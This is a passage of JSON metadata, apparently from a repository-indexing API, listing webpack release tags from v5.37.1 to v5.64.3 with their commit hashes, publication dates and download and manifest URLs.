rsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.64.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.64.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.64.3/manifests"},{"name":"v5.64.2","sha":"0065223c4ddac3bf872bc8d660ef1e9a63afa080","kind":"tag","published_at":"2021-11-20T13:43:51.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.64.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.64.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.64.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.64.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.64.2/manifests"},{"name":"v5.64.1","sha":"3d5503a5b535b89bbdde78535c1839cefd88e4fa","kind":"tag","published_at":"2021-11-15T17:16:22.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.64.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.64.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.64.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.64.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.64.1/manifests"},{"name":"v5.64.0","sha":"789e58514b5747f6474bc247e4e104ce22892a2c","kind":"tag","published_at":"2021-11-11T14:16:53.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.64.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.64.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.64.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.64.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.64.0/manifests"},{"name":"v5.63.0","sha":"f011c70aacbd4dd3c4e518b9b9d8ea945dce0a9a","kind":"tag","published_at":"2021-11-09T19:30:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.63.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.63.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.63.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.63.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.63.0/manifests"},{"name":"v5.62.2","sha":"3aed1fe0249f8730a35fab62e3cdc3b399b0b6e9","kind":"tag","published_at":"2021-11-09T11:12:21.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.62.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.62.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.62.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.62.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.62.2/manifests"},{"name":"v5.62.1","sha":"daba59b3d60e7895543b6563682c209e4ad6b8b8","kind":"tag","published_at":"2021-11-05T16:26:04.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.62.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.62.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.62.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.62.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.62.1/manifests"},{"name":"v5.62.0","sha":"04640dcc757c8b3e78c6cbf6e4dda7cbbde33fe2","kind":"tag","published_at":"2021-11-05T14:56:11.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.62.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.62.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.62.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.62.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.62.0/manifests"},{"name":"v5.61.0","sha":"0306510f7d1b9b13900f1dcf78a767c2ed390a61","kind":"tag","published_at":"2021-10-29T14:00:19.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.61.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.61.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.61.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.61.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.61.0/manifests"},{"name":"v5.60.0","sha":"f0298fe46fc22eebf42eb034a9435d7c19aeddd9","kind":"tag","published_at":"2021-10-25T16:20:06.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.60.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.60.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.60.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.60.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.60.0/manifests"},{"name":"v5.59.1","sha":"3dbbdcb28cce3860247f06a18e48f536ab266834","kind":"tag","published_at":"2021-10-20T21:39:50.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.59.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.59.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.59.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.59.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.59.1/manifests"},{"name":"v5.59.0","sha":"19ca23f062544263f48d2947da0ecfb29ae0bb36","kind":"tag","published_at":"2021-10-19T17:54:30.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.59.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.59.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.59.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.59.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.59.0/manifests"},{"name":"v5.58.2","sha":"8a6d156c156282dd3d0ba001187c282402a1177f","kind":"tag","published_at":"2021-10-13T09:39:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.58.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.58.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.58.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.58.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.58.2/manifests"},{"name":"v5.58.1","sha":"2eecffb2739d13d3095568d118ffc0baacec5cd8","kind":"tag","published_at":"2021-10-08T13:41:06.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.58.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.58.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.58.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.58.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.58.1/manifests"},{"name":"v5.58.0","sha":"7666277551be32947227e80fb2fccdbbe656254b","kind":"tag","published_at":"2021-10-07T15:48:14.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.58.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.58.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.58.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.58.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.58.0/manifests"},{"name":"v5.57.1","sha":"0581bb3c1c32bcb3e182a0f732b862a6c5bb7846","kind":"tag","published_at":"2021-10-05T18:25:17.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.57.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.57.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.57.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.57.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.57.1/manifests"},{"name":"v5.57.0","sha":"e841ab01417f8e1dd6a2533638f848b5ad0c7d16","kind":"tag","published_at":"2021-10-05T15:06:43.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.57.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.57.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.57.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.57.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.57.0/manifests"},{"name":"v5.56.1","sha":"ed55e200efb0dad7716d509c82a6ed82aee86c51","kind":"tag","published_at":"2021-10-04T07:32:43.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.56.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.56.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.56.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.56.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.56.1/manifests"},{"name":"v5.56.0","sha":"4eb122092d9696ac5286bc2dcf3eacfb901f4fed","kind":"tag","published_at":"2021-10-01T14:12:50.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.56.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.56.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.56.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.56.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.56.0/manifests"},{"name":"v5.55.1","sha":"e78403d6a8d4e682fbd4a0eb58f042866cfde42a","kind":"tag","published_at":"2021-09-29T08:56:23.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.55.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.55.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.55.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.55.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.55.1/manifests"},{"name":"v5.55.0","sha":"5db30851c7ed007d8f94150ee2c6a1b47d10d388","kind":"tag","published_at":"2021-09-28T17:39:42.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.55.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.55.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.55.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.55.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.55.0/manifests"},{"name":"v5.54.0","sha":"45829826701ff6582ea16bc36376d105ff264c26","kind":"tag","published_at":"2021-09-24T19:07:08.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.54.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.54.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.54.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.54.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.54.0/manifests"},{"name":"v5.53.0","sha":"6796b73a1ab83739f0e722d914676c9dd58d65e2","kind":"tag","published_at":"2021-09-16T13:52:02.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.53.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.53.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.53.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.53.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.53.0/manifests"},{"name":"v5.52.1","sha":"d95a0418b64bd366f0c51f2635ef0c24158b8bce","kind":"tag","published_at":"2021-09-10T08:55:46.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.52.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.52.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.52.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.52.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.52.1/manifests"},{"name":"v5.52.0","sha":"4edd3800567f279edd7091af14b3385552a8972f","kind":"tag","published_at":"2021-09-03T15:27:17.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.52.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.52.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.52.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.52.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.52.0/manifests"},{"name":"v5.51.2","sha":"684e22ec4d6e6221de8a4a8a6b3b8f37b863a09d","kind":"tag","published_at":"2021-09-02T13:24:22.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.51.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.51.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.51.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.51.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.51.2/manifests"},{"name":"v5.51.1","sha":"d3da48e7e3da3042b7142fe3deced0bcaac3e704","kind":"tag","published_at":"2021-08-19T14:16:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.51.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.51.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.51.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.51.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.51.1/manifests"},{"name":"v5.51.0","sha":"bd7cb37f1c0d872cfff9fc27c7db52a25e1ba6a3","kind":"tag","published_at":"2021-08-19T09:04:32.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.51.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.51.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.51.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.51.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.51.0/manifests"},{"name":"v5.50.0","sha":"400a0f94ab45ca20b10f219c8311e87d3d3f108c","kind":"tag","published_at":"2021-08-10T18:31:51.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.50.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.50.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.50.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.50.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.50.0/manifests"},{"name":"v5.49.0","sha":"d3868384c37f9d674d1db17a0198393bd213c763","kind":"tag","published_at":"2021-08-06T11:07:54.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.49.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.49.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.49.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.49.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.49.0/manifests"},{"name":"v5.48.0","sha":"67f3aef3c11e2a8d9e7dc1e0300350588ebd7aec","kind":"tag","published_at":"2021-08-02T12:36:22.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.48.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.48.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.48.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.48.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.48.0/manifests"},{"name":"v5.47.1","sha":"3f353b6ae29ae6d96e0ab86e7233b4c785f99c60","kind":"tag","published_at":"2021-07-29T14:19:47.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.47.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.47.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.47.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.47.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.47.1/manifests"},{"name":"v5.47.0","sha":"efeb1287e52870036cc01b22476852205e99c31a","kind":"tag","published_at":"2021-07-27T14:27:46.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.47.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.47.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.47.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.47.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.47.0/manifests"},{"name":"v5.46.0","sha":"a32b0fd041260f3303b9329c9a65cc4afe102390","kind":"tag","published_at":"2021-07-22T10:14:35.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.46.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.46.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.46.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.46.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.46.0/manifests"},{"name":"v5.45.1","sha":"7102df3bb52a33529ff5db4fdf34484d2a359a49","kind":"tag","published_at":"2021-07-16T20:09:59.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.45.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.45.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.45.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.45.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.45.1/manifests"},{"name":"v5.45.0","sha":"db52c58a4fb037ece22be6365f56c11bc78fb426","kind":"tag","published_at":"2021-07-16T15:50:18.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.45.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.45.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.45.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.45.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.45.0/manifests"},{"name":"v5.44.0","sha":"f20158d4492e73d07a36cd1614dfbd1dc1ea143d","kind":"tag","published_at":"2021-07-08T19:37:47.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.44.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.44.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.44.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.44.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.44.0/manifests"},{"name":"v5.43.0","sha":"b53a06437a3e8b2756c550c1be6ccb33fdba03d7","kind":"tag","published_at":"2021-07-06T19:07:56.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.43.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.43.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.43.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.43.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.43.0/manifests"},{"name":"v5.42.1","sha":"4156b20644d309c0e8acaa1e22ca3a4fe546c0b6","kind":"tag","published_at":"2021-07-05T14:05:51.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.42.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.42.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.42.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.42.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.42.1/manifests"},{"name":"v5.42.0","sha":"4fb45402eec7efe1c70e641cab7b24331948ea8d","kind":"tag","published_at":"2021-07-02T07:04:21.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.42.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.42.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.42.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.42.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.42.0/manifests"},{"name":"v5.41.1","sha":"9ed05afbeaf87442d86863a20a6c30b0ab437fb5","kind":"tag","published_at":"2021-06-29T14:30:17.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.41.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.41.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.41.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.41.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.41.1/manifests"},{"name":"v5.41.0","sha":"fd5dc9997671b4c4b32d15f722e06079cd5da2db","kind":"tag","published_at":"2021-06-28T16:23:10.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.41.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.41.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.41.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.41.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.41.0/manifests"},{"name":"v5.40.0","sha":"5d297327bc1f208de16c29f5c9b31d2b8a06bce4","kind":"tag","published_at":"2021-06-21T16:25:29.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.40.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.40.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.40.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.40.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.40.0/manifests"},{"name":"v5.39.1","sha":"e5ccd070f6c18794173d3f2e60445de5bc2f52a2","kind":"tag","published_at":"2021-06-17T10:21:20.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.39.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.39.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.39.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.39.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.39.1/manifests"},{"name":"v5.39.0","sha":"e9f90450d5d8b4e796e5e0e9674869220ab73bcb","kind":"tag","published_at":"2021-06-14T21:31:10.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.39.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.39.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.39.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.39.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.39.0/manifests"},{"name":"v5.38.1","sha":"487665cb69f7b1f1aac44097124ef8f33cfe247b","kind":"tag","published_at":"2021-05-27T21:12:28.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.38.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.38.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.38.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.38.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.38.1/manifests"},{"name":"v5.38.0","sha":"daa0f1ed1cebc28c8cc9034f95f3b56e9253ec5e","kind":"tag","published_at":"2021-05-27T12:41:53.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.38.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.38.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.38.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.38.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.38.0/manifests"},{"name":"v5.37.1","sha":"2a5ed4a2dcbe06e852f84a8e7f63145af87cb139","kind":"tag","published_at":"2021-05-19T06:50:32.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.37.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.37.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.37.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.